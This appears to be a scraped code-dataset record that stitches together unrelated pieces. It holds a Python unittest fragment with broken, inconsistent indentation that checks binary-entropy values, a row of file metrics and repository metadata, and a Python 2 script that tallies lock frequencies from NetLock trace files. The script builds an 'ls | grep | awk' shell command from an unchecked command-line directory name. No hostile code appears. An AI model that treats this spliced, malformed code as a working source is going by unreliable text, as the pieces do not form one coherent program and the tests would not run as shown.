    self.assertAlmostEqual(cpl.bien('11111010'), 0.22952306172250708)
    self.assertAlmostEqual(cpl.bien('11111011'), 0.9454843334903775)
    self.assertAlmostEqual(cpl.bien('11111100'), 0.44747006666680555)
    self.assertAlmostEqual(cpl.bien('11111101'), 0.9370347771941213)
    self.assertAlmostEqual(cpl.bien('11111110'), 0.9170735521822547)
    self.assertAlmostEqual(cpl.bien('11111111'), 0.0)
def test_tbien(self):
# 2-bit strings
self.assertEqual(cpl.tbien('00'), 0.0)
self.assertEqual(cpl.tbien('01'), 1.0)
self.assertEqual(cpl.tbien('10'), 1.0)
self.assertEqual(cpl.tbien('11'), 0.0)
# 4-bit strings, asserts equality to 7 decimal places
self.assertAlmostEqual(cpl.tbien('0000'), 0.0)
self.assertAlmostEqual(cpl.tbien('0001'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('0010'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('0011'), 0.5355473378808682)
self.assertAlmostEqual(cpl.tbien('0100'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('0101'), 0.21810429198553155)
self.assertAlmostEqual(cpl.tbien('0110'), 0.5355473378808682)
self.assertAlmostEqual(cpl.tbien('0111'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('1000'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('1001'), 0.5355473378808682)
self.assertAlmostEqual(cpl.tbien('1010'), 0.21810429198553155)
self.assertAlmostEqual(cpl.tbien('1011'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('1100'), 0.5355473378808682)
self.assertAlmostEqual(cpl.tbien('1101'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('1110'), 0.9305948708049089)
self.assertAlmostEqual(cpl.tbien('1111'), 0.0)
# 8-bit strings, asserts equality to 7 decimal places
self.assertAlmostEqual(cpl.tbien('00000000'), 0.0)
self.assertAlmostEqual(cpl.tbien('00000001'), 0.7930318630672043)
self.assertAlmostEqual(cpl.tbien('00000010'), 0.8589468375430831)
self.assertAlmostEqual(cpl.tbien('00000011'), 0.6813985994017482)
self.assertAlmostEqual(cpl.tbien('00000100'), 0.8940170728237214)
self.assertAlmostEqual(cpl.tbien('00000101'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('00000110'), 0.7202007974767275)
self.assertAlmostEqual(cpl.tbien('00000111'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('00001000'), 0.8562234604151914)
self.assertAlmostEqual(cpl.tbien('00001001'), 0.7706444709379511)
self.assertAlmostEqual(cpl.tbien('00001010'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('00001011'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00001100'), 0.7095199614690969)
self.assertAlmostEqual(cpl.tbien('00001101'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('00001110'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('00001111'), 0.3940627705450895)
self.assertAlmostEqual(cpl.tbien('00010000'), 0.8562234604151914)
self.assertAlmostEqual(cpl.tbien('00010001'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('00010010'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('00010011'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00010100'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('00010101'), 0.8858024472734408)
self.assertAlmostEqual(cpl.tbien('00010110'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('00010111'), 0.7345054241526495)
self.assertAlmostEqual(cpl.tbien('00011000'), 0.747313573877627)
self.assertAlmostEqual(cpl.tbien('00011001'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('00011010'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('00011011'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('00011100'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('00011101'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('00011110'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('00011111'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('00100000'), 0.8940170728237214)
self.assertAlmostEqual(cpl.tbien('00100001'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('00100010'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('00100011'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('00100100'), 0.7221700225217904)
self.assertAlmostEqual(cpl.tbien('00100101'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('00100110'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('00100111'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('00101000'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('00101001'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('00101010'), 0.819887472797562)
self.assertAlmostEqual(cpl.tbien('00101011'), 0.7596489755084861)
self.assertAlmostEqual(cpl.tbien('00101100'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00101101'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('00101110'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('00101111'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00110000'), 0.7095199614690969)
self.assertAlmostEqual(cpl.tbien('00110001'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('00110010'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('00110011'), 0.1674302125437542)
self.assertAlmostEqual(cpl.tbien('00110100'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00110101'), 0.7325361991075866)
self.assertAlmostEqual(cpl.tbien('00110110'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('00110111'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('00111000'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('00111001'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('00111010'), 0.7829798725688102)
self.assertAlmostEqual(cpl.tbien('00111011'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('00111100'), 0.4221841326124382)
self.assertAlmostEqual(cpl.tbien('00111101'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('00111110'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('00111111'), 0.6813985994017482)
self.assertAlmostEqual(cpl.tbien('01000000'), 0.8589468375430831)
self.assertAlmostEqual(cpl.tbien('01000001'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('01000010'), 0.7221700225217904)
self.assertAlmostEqual(cpl.tbien('01000011'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('01000100'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('01000101'), 0.8830790701455491)
self.assertAlmostEqual(cpl.tbien('01000110'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01000111'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('01001000'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('01001001'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('01001010'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('01001011'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('01001100'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('01001101'), 0.7596489755084861)
self.assertAlmostEqual(cpl.tbien('01001110'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('01001111'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('01010000'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('01010001'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('01010010'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('01010011'), 0.7325361991075866)
self.assertAlmostEqual(cpl.tbien('01010100'), 0.819887472797562)
self.assertAlmostEqual(cpl.tbien('01010101'), 0.06536286053488224)
self.assertAlmostEqual(cpl.tbien('01010110'), 0.6937340010326074)
self.assertAlmostEqual(cpl.tbien('01010111'), 0.8858024472734408)
self.assertAlmostEqual(cpl.tbien('01011000'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('01011001'), 0.721855363099956)
self.assertAlmostEqual(cpl.tbien('01011010'), 0.39406277054508954)
self.assertAlmostEqual(cpl.tbien('01011011'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('01011100'), 0.7829798725688102)
self.assertAlmostEqual(cpl.tbien('01011101'), 0.8830790701455491)
self.assertAlmostEqual(cpl.tbien('01011110'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01011111'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('01100000'), 0.7202007974767275)
self.assertAlmostEqual(cpl.tbien('01100001'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01100010'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01100011'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('01100100'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('01100101'), 0.721855363099956)
self.assertAlmostEqual(cpl.tbien('01100110'), 0.1674302125437542)
self.assertAlmostEqual(cpl.tbien('01100111'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('01101000'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('01101001'), 0.4221841326124382)
self.assertAlmostEqual(cpl.tbien('01101010'), 0.6937340010326074)
self.assertAlmostEqual(cpl.tbien('01101011'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('01101100'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('01101101'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('01101110'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('01101111'), 0.7706444709379511)
self.assertAlmostEqual(cpl.tbien('01110000'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('01110001'), 0.7345054241526495)
self.assertAlmostEqual(cpl.tbien('01110010'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('01110011'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('01110100'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('01110101'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('01110110'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('01110111'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('01111000'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('01111001'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01111010'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('01111011'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('01111100'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('01111101'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('01111110'), 0.747313573877627)
self.assertAlmostEqual(cpl.tbien('01111111'), 0.7930318630672043)
self.assertAlmostEqual(cpl.tbien('10000000'), 0.7930318630672043)
self.assertAlmostEqual(cpl.tbien('10000001'), 0.747313573877627)
self.assertAlmostEqual(cpl.tbien('10000010'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('10000011'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('10000100'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('10000101'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10000110'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10000111'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('10001000'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('10001001'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('10001010'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('10001011'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('10001100'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('10001101'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('10001110'), 0.7345054241526495)
self.assertAlmostEqual(cpl.tbien('10001111'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('10010000'), 0.7706444709379511)
self.assertAlmostEqual(cpl.tbien('10010001'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('10010010'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('10010011'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('10010100'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('10010101'), 0.6937340010326074)
self.assertAlmostEqual(cpl.tbien('10010110'), 0.4221841326124382)
self.assertAlmostEqual(cpl.tbien('10010111'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('10011000'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('10011001'), 0.1674302125437542)
self.assertAlmostEqual(cpl.tbien('10011010'), 0.721855363099956)
self.assertAlmostEqual(cpl.tbien('10011011'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('10011100'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('10011101'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10011110'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10011111'), 0.7202007974767275)
self.assertAlmostEqual(cpl.tbien('10100000'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('10100001'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10100010'), 0.8830790701455491)
self.assertAlmostEqual(cpl.tbien('10100011'), 0.7829798725688102)
self.assertAlmostEqual(cpl.tbien('10100100'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('10100101'), 0.39406277054508954)
self.assertAlmostEqual(cpl.tbien('10100110'), 0.721855363099956)
self.assertAlmostEqual(cpl.tbien('10100111'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('10101000'), 0.8858024472734408)
self.assertAlmostEqual(cpl.tbien('10101001'), 0.6937340010326074)
self.assertAlmostEqual(cpl.tbien('10101010'), 0.06536286053488224)
self.assertAlmostEqual(cpl.tbien('10101011'), 0.819887472797562)
self.assertAlmostEqual(cpl.tbien('10101100'), 0.7325361991075866)
self.assertAlmostEqual(cpl.tbien('10101101'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('10101110'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('10101111'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('10110000'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('10110001'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('10110010'), 0.7596489755084861)
self.assertAlmostEqual(cpl.tbien('10110011'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('10110100'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('10110101'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('10110110'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('10110111'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('10111000'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('10111001'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('10111010'), 0.8830790701455491)
self.assertAlmostEqual(cpl.tbien('10111011'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('10111100'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('10111101'), 0.7221700225217904)
self.assertAlmostEqual(cpl.tbien('10111110'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('10111111'), 0.8589468375430831)
self.assertAlmostEqual(cpl.tbien('11000000'), 0.6813985994017482)
self.assertAlmostEqual(cpl.tbien('11000001'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('11000010'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('11000011'), 0.4221841326124382)
self.assertAlmostEqual(cpl.tbien('11000100'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('11000101'), 0.7829798725688102)
self.assertAlmostEqual(cpl.tbien('11000110'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('11000111'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('11001000'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11001001'), 0.5687245018070307)
self.assertAlmostEqual(cpl.tbien('11001010'), 0.7325361991075866)
self.assertAlmostEqual(cpl.tbien('11001011'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11001100'), 0.1674302125437542)
self.assertAlmostEqual(cpl.tbien('11001101'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('11001110'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('11001111'), 0.7095199614690969)
self.assertAlmostEqual(cpl.tbien('11010000'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11010001'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('11010010'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('11010011'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11010100'), 0.7596489755084861)
self.assertAlmostEqual(cpl.tbien('11010101'), 0.819887472797562)
self.assertAlmostEqual(cpl.tbien('11010110'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('11010111'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('11011000'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('11011001'), 0.8984525083261343)
self.assertAlmostEqual(cpl.tbien('11011010'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('11011011'), 0.7221700225217904)
self.assertAlmostEqual(cpl.tbien('11011100'), 0.8957291311982426)
self.assertAlmostEqual(cpl.tbien('11011101'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('11011110'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('11011111'), 0.8940170728237214)
self.assertAlmostEqual(cpl.tbien('11100000'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('11100001'), 0.43286496862006874)
self.assertAlmostEqual(cpl.tbien('11100010'), 0.7451862601602801)
self.assertAlmostEqual(cpl.tbien('11100011'), 0.9208726825540792)
self.assertAlmostEqual(cpl.tbien('11100100'), 0.6037947370876691)
self.assertAlmostEqual(cpl.tbien('11100101'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('11100110'), 0.8606588959176042)
self.assertAlmostEqual(cpl.tbien('11100111'), 0.747313573877627)
self.assertAlmostEqual(cpl.tbien('11101000'), 0.7345054241526495)
self.assertAlmostEqual(cpl.tbien('11101001'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('11101010'), 0.8858024472734408)
self.assertAlmostEqual(cpl.tbien('11101011'), 0.59145933545681)
self.assertAlmostEqual(cpl.tbien('11101100'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11101101'), 0.732850858529421)
self.assertAlmostEqual(cpl.tbien('11101110'), 0.28582053198265955)
self.assertAlmostEqual(cpl.tbien('11101111'), 0.8562234604151914)
self.assertAlmostEqual(cpl.tbien('11110000'), 0.3940627705450895)
self.assertAlmostEqual(cpl.tbien('11110001'), 0.9315535185617098)
self.assertAlmostEqual(cpl.tbien('11110010'), 0.9442035796144033)
self.assertAlmostEqual(cpl.tbien('11110011'), 0.7095199614690969)
self.assertAlmostEqual(cpl.tbien('11110100'), 0.9335227436067727)
self.assertAlmostEqual(cpl.tbien('11110101'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('11110110'), 0.7706444709379511)
self.assertAlmostEqual(cpl.tbien('11110111'), 0.8562234604151914)
self.assertAlmostEqual(cpl.tbien('11111000'), 0.8927513204867304)
self.assertAlmostEqual(cpl.tbien('11111001'), 0.7202007974767275)
self.assertAlmostEqual(cpl.tbien('11111010'), 0.5563891001761716)
self.assertAlmostEqual(cpl.tbien('11111011'), 0.8940170728237214)
self.assertAlmostEqual(cpl.tbien('11111100'), 0.6813985994017482)
self.assertAlmostEqual(cpl.tbien('11111101'), 0.8589468375430831)
self.assertAlmostEqual(cpl.tbien('11111110'), 0.7930318630672043)
self.assertAlmostEqual(cpl.tbien('11111111'), 0.0)
def test_cyclic_binary_derivative(self):
    """The expected values form a chain: each derivative is the input
    of the next assertion, ending at the all-ones string."""
    chain = [
        '10101110',
        '11110011',
        '00010100',
        '00111100',
        '01000100',
        '11001100',
        '01010101',
        '11111111',
    ]
    for current, successor in zip(chain, chain[1:]):
        self.assertEqual(cpl.cyclic_binary_derivative(current), successor)
def test_ktbien(self):
    """Exact ktbien values for every 2-bit string, plus one longer case."""
    # 2-bit strings: heterogeneous pairs score 1.0, homogeneous pairs 0.0.
    two_bit_cases = (
        ('00', 0.0),
        ('01', 1.0),
        ('10', 1.0),
        ('11', 0.0),
    )
    for bits, expected in two_bit_cases:
        self.assertEqual(cpl.ktbien(bits), expected)
    # other cases
    self.assertAlmostEqual(cpl.ktbien('10101110'), 0.9209131731629818)
| 70.408867 | 78 | 0.722405 | 4,173 | 42,879 | 7.412892 | 0.097771 | 0.369981 | 0.422836 | 0.246202 | 0.849745 | 0.831157 | 0.012963 | 0.009763 | 0.009763 | 0.009763 | 0 | 0.373851 | 0.139882 | 42,879 | 608 | 79 | 70.524671 | 0.464901 | 0.006087 | 0 | 0 | 0 | 0 | 0.106644 | 0 | 0 | 0 | 0 | 0 | 0.986486 | 1 | 0.008446 | false | 0 | 0.003378 | 0 | 0.013514 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d03e7e195c1018c535ed8c9294c8ba6017f0669a | 6,271 | py | Python | dpdk_code/lock_server_code/statistic.py | netx-repo/NetLock | b4f44efd7b01bca2ecd661a5c7876ada4d7af5fb | [
"Apache-2.0"
] | 12 | 2020-07-31T13:51:00.000Z | 2022-01-02T08:03:19.000Z | dpdk_code/lock_server_code/statistic.py | netx-repo/NetLock | b4f44efd7b01bca2ecd661a5c7876ada4d7af5fb | [
"Apache-2.0"
] | null | null | null | dpdk_code/lock_server_code/statistic.py | netx-repo/NetLock | b4f44efd7b01bca2ecd661a5c7876ada4d7af5fb | [
"Apache-2.0"
] | 2 | 2020-09-02T18:26:36.000Z | 2021-04-21T06:14:11.000Z | import os, sys, subprocess
# Upper bound on distinct lock ids expected in a trace; sizes the count
# tables in no_map() and bounds the id space in max_lock_freq_per_txn().
MAX_LOCK_NUM = 7000000
def print_usage():
print "Usage:"
print " ./statistic.py dirname client_num warehouse_num"
return
def do_map(dirname, client_num, warehouse):
print "dirname:", dirname
cmd_list = "ls -l " + dirname + " | grep trace | awk -F [' ']+ '{print $9}'"
output_list = subprocess.check_output(cmd_list, shell=True).strip('\n')
file_list = output_list.split('\n')
lock_num = 50000
print file_list
count = [0 for i in range(lock_num)]
for filename in file_list:
fullname = dirname.split('\\')[0] + dirname.split('\\')[1] + "/" + filename
print fullname
fin = open(fullname)
fin.readline()
fin.readline()
while True:
line = fin.readline()
if not line:
break
words = [x.strip() for x in line.split(',')]
txn_id = int(words[0])
action_type = int(words[1])
target_lm_id = int(words[2])
target_obj_idx = int(words[3])
lock_type = int(words[4])
target_obj_idx = target_obj_idx + 1
if (lock_type == 7) or (lock_type == 8):
lock_type = 1
elif (lock_type == 9):
lock_type = 2
lock_type = lock_type - 1
if (target_obj_idx <= 20):
lock_id = target_obj_idx
else:
lock_id = 20 + (target_obj_idx - 20) / 150
count[lock_id] += 1
l_count = []
for i in range(lock_num + 1):
l_count.append((i, count[i]))
l_count.sort(key = (lambda element:element[1]), reverse = True)
fout = open("stat/tpcc_incast_"+ client_num +"_w_" + warehouse +"_domap.stat", "w")
for i in range(lock_num + 1):
if l_count[i][1] > 0:
fout.write(str(l_count[i][0])+','+str(l_count[i][1])+'\n')
fout.close()
def no_map(dirname, client_num, warehouse):
print "dirname:", dirname
cmd_list = "ls -l " + dirname + " | grep trace | awk -F [' ']+ '{print $9}'"
output_list = subprocess.check_output(cmd_list, shell=True).strip('\n')
file_list = output_list.split('\n')
print file_list
lock_num = MAX_LOCK_NUM
count = [0 for i in range(lock_num+1)]
for filename in file_list:
num_file = int(filename.strip('.csv').strip('trace_'))
if num_file > 64+40:
continue
fullname = dirname.split('\\')[0] + dirname.split('\\')[1] + "/" + filename
print fullname
fin = open(fullname)
fin.readline()
fin.readline()
while True:
line = fin.readline()
if not line:
break
words = [x.strip() for x in line.split(',')]
if (len(words) <= 4):
continue
txn_id = int(words[0])
action_type = int(words[1])
if (action_type == 1):
continue
target_lm_id = int(words[2])
target_obj_idx = int(words[3])
lock_type = int(words[4])
target_obj_idx = target_obj_idx + 1
if (lock_type == 7) or (lock_type == 8):
lock_type = 1
elif (lock_type == 9):
lock_type = 2
lock_type = lock_type - 1
lock_id = target_obj_idx
count[lock_id] += 1
l_count = []
for i in range(lock_num + 1):
l_count.append((i, count[i]))
l_count.sort(key = (lambda element:element[1]), reverse = True)
fout = open("stat/tpcc_multiserver_"+ client_num +"_w_" + warehouse +"_nomap.stat", "w")
for i in range(lock_num + 1):
if l_count[i][1] > 0:
fout.write(str(l_count[i][0])+','+str(l_count[i][1])+'\n')
fout.close()
def max_lock_freq_per_txn(dirname, client_num, warehouse):
print "dirname:", dirname
cmd_list = "ls -l " + dirname + " | grep trace | awk -F [' ']+ '{print $9}'"
output_list = subprocess.check_output(cmd_list, shell=True).strip('\n')
file_list = output_list.split('\n')
print file_list
lock_num = MAX_LOCK_NUM
old_txn_id = -1
count = {}
max_c = 0
for filename in file_list:
fullname = dirname.split('\\')[0] + dirname.split('\\')[1] + "/" + filename
print fullname
fin = open(fullname)
fin.readline()
fin.readline()
while True:
line = fin.readline()
if not line:
break
words = [x.strip() for x in line.split(',')]
txn_id = int(words[0])
action_type = int(words[1])
if action_type == 1:
continue
if (txn_id != old_txn_id):
if (len(count) != 0):
for i in count:
if (count[i] > max_c):
max_c = count[i]
max_lock = i
max_txn = old_txn_id
count_log = count
# if (max(count.values()) > max_c):
# max_c = max(count.values())
# max_lock = max(count, key=count.get)
# max_txn = old_txn_id
# count_log = count
old_txn_id = txn_id
count = {}
target_lm_id = int(words[2])
target_obj_idx = int(words[3])
lock_type = int(words[4])
target_obj_idx = target_obj_idx + 1
if (lock_type == 7) or (lock_type == 8):
lock_type = 1
elif (lock_type == 9):
lock_type = 2
lock_type = lock_type - 1
lock_id = target_obj_idx
if (lock_id not in count):
count[lock_id] = 1
else:
count[lock_id] += 1
print max_txn, ":", max_lock, ":", max_c
print count_log
print "max count:", max_c
def main():
    """Entry point: validate argv, then run the no-map statistic pass."""
    # Need dirname, client_num and warehouse on the command line.
    if len(sys.argv) <= 3:
        print_usage()
        sys.exit(-1)
    dirname, client_num, warehouse = sys.argv[1], sys.argv[2], sys.argv[3]
    # max_lock_freq_per_txn(dirname, client_num, warehouse) is the
    # alternative per-transaction analysis pass.
    no_map(dirname, client_num, warehouse)
if __name__ == '__main__':
main() | 35.230337 | 92 | 0.509807 | 810 | 6,271 | 3.702469 | 0.134568 | 0.064021 | 0.056019 | 0.050017 | 0.772591 | 0.755585 | 0.744915 | 0.744582 | 0.71057 | 0.690897 | 0 | 0.025398 | 0.359592 | 6,271 | 178 | 93 | 35.230337 | 0.721365 | 0.033009 | 0 | 0.70625 | 0 | 0 | 0.059095 | 0.003632 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.00625 | null | null | 0.11875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.